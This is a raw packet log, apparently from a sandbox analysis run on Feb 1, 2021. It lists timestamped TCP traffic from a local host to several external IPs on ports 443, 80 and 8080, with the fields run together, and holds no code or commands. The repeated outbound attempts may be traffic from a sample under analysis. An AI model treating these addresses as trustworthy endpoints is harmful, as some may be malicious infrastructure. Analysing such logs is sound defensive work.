                                                                                                                              Feb 1, 2021 23:25:16.520273924 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:16.520302057 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.520325899 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:16.520396948 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:16.555680990 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.555725098 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.555757046 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.555811882 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.555843115 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.555895090 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.555923939 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.555928946 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:16.555954933 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.556022882 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.556052923 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:16.556056976 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.556062937 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:16.556098938 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.556129932 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.556180000 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.556206942 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.556235075 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:16.556243896 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:16.556257010 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.556524992 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:16.605983019 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:16.912554979 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.065234900 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.065489054 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.065936089 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.218677998 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.220899105 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.220958948 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.221002102 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.221103907 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.233995914 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.386765003 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.388068914 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.394598961 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.547605991 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592668056 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592698097 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592715025 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592751980 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592784882 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592812061 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592839956 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592868090 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592899084 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592926025 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.593077898 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.593157053 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.745815992 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.745874882 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.745932102 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.745985985 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746015072 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746037006 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746067047 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746088982 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746139050 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746156931 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746190071 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746238947 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746248007 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746289015 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746337891 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746356010 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746387959 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746438026 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746486902 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746491909 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746539116 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746562958 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746591091 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746644974 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746651888 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746696949 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746750116 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746758938 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746800900 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746862888 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.899545908 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.899611950 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.899663925 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.899713039 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.899740934 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.899790049 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.899797916 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.899878979 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.899940014 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.899970055 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.900006056 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900065899 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900079012 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.900129080 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900190115 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900206089 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.900283098 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900361061 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.900366068 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900448084 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900520086 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.900527000 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900603056 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900669098 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900671005 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.900746107 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900806904 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900824070 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.900867939 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900928020 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900990009 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901046038 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.901053905 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901108980 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.901115894 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901161909 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901230097 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901279926 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.901289940 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901338100 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.901350021 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901413918 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.901436090 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901490927 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901540995 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901575089 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.901591063 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901640892 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901665926 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.901690960 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901740074 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901761055 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.901788950 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901838064 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901856899 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.901886940 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901937008 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901988029 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.901995897 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.902079105 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.054636002 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.054683924 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.054754019 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.054821014 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.054883003 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.054928064 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.054949045 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.055012941 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.055012941 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.055067062 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.055074930 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.055135965 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.055197954 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.055198908 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.055259943 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.055304050 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.055322886 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.055389881 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.055406094 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.055466890 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.055541039 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.055541992 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.055603027 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.055663109 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.055687904 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.055723906 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.055783987 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.055824041 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.055847883 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.055916071 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.055933952 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.055979013 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.056040049 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.056056976 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.056102991 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.056163073 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.056188107 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.056224108 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.056284904 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.056308031 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.056345940 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.056411028 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.056454897 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.056474924 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.056535959 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.056550980 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.056597948 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.056658030 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.056679010 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.056718111 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.056778908 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.056806087 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.056840897 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.056900024 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.056929111 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.056972980 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.057038069 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.057054996 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.057096958 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.057156086 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.057172060 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.057216883 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.057276011 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.057293892 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.057336092 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.057409048 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.057424068 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.057481050 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.057540894 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.057560921 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.057591915 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.057663918 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.211904049 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.211970091 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.212023020 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.212073088 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.212122917 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.212162971 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.212188959 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.212212086 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.212244987 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.212269068 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.212296009 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.212346077 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.212364912 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.212397099 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.212446928 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.212466002 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.212496996 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.212547064 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.212574005 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.212596893 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.212646961 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.212687016 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.212699890 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.212750912 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.212769985 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.212800026 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.212850094 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.212865114 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.212899923 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.212966919 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.212985039 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.213027954 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.213089943 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.213107109 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.213148117 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.213206053 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.213224888 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.213267088 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.213327885 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.213345051 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.213422060 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.213495970 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.213526011 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.213565111 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.213637114 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.213653088 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.213727951 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.213790894 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.213799000 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.213843107 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.213892937 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.213907003 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.213943958 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.213996887 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.214011908 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.214052916 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.214102983 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.214122057 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.214153051 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.214201927 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.214222908 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.214253902 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.214309931 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.214345932 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.214360952 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.214410067 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.214440107 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.214462042 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.214510918 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.214544058 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.214561939 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.214701891 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.367544889 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.367634058 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.367697001 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.367748976 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.367801905 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.367842913 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.367847919 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:18.367891073 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:18.367897987 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:21.139810085 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:21.140079975 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:31.986850023 CET4975180192.168.2.497.120.3.198
                                                                                                                              Feb 1, 2021 23:25:34.998045921 CET4975180192.168.2.497.120.3.198
                                                                                                                              Feb 1, 2021 23:25:41.015232086 CET4975180192.168.2.497.120.3.198
                                                                                                                              Feb 1, 2021 23:25:58.622665882 CET4976480192.168.2.470.180.33.202
                                                                                                                              Feb 1, 2021 23:26:01.625193119 CET4976480192.168.2.470.180.33.202
                                                                                                                              Feb 1, 2021 23:26:07.641457081 CET4976480192.168.2.470.180.33.202
                                                                                                                              Feb 1, 2021 23:26:27.590560913 CET497738080192.168.2.450.116.111.59
                                                                                                                              Feb 1, 2021 23:26:27.749161959 CET80804977350.116.111.59192.168.2.4
                                                                                                                              Feb 1, 2021 23:26:28.252470016 CET497738080192.168.2.450.116.111.59
                                                                                                                              Feb 1, 2021 23:26:28.410223961 CET80804977350.116.111.59192.168.2.4
                                                                                                                              Feb 1, 2021 23:26:28.924487114 CET497738080192.168.2.450.116.111.59
                                                                                                                              Feb 1, 2021 23:26:29.082959890 CET80804977350.116.111.59192.168.2.4
                                                                                                                              Feb 1, 2021 23:26:34.744951963 CET49775443192.168.2.4173.249.20.233
                                                                                                                              Feb 1, 2021 23:26:34.794766903 CET44349775173.249.20.233192.168.2.4
                                                                                                                              Feb 1, 2021 23:26:34.797445059 CET49775443192.168.2.4173.249.20.233
                                                                                                                              Feb 1, 2021 23:26:34.798719883 CET49775443192.168.2.4173.249.20.233
                                                                                                                              Feb 1, 2021 23:26:34.800693989 CET49775443192.168.2.4173.249.20.233
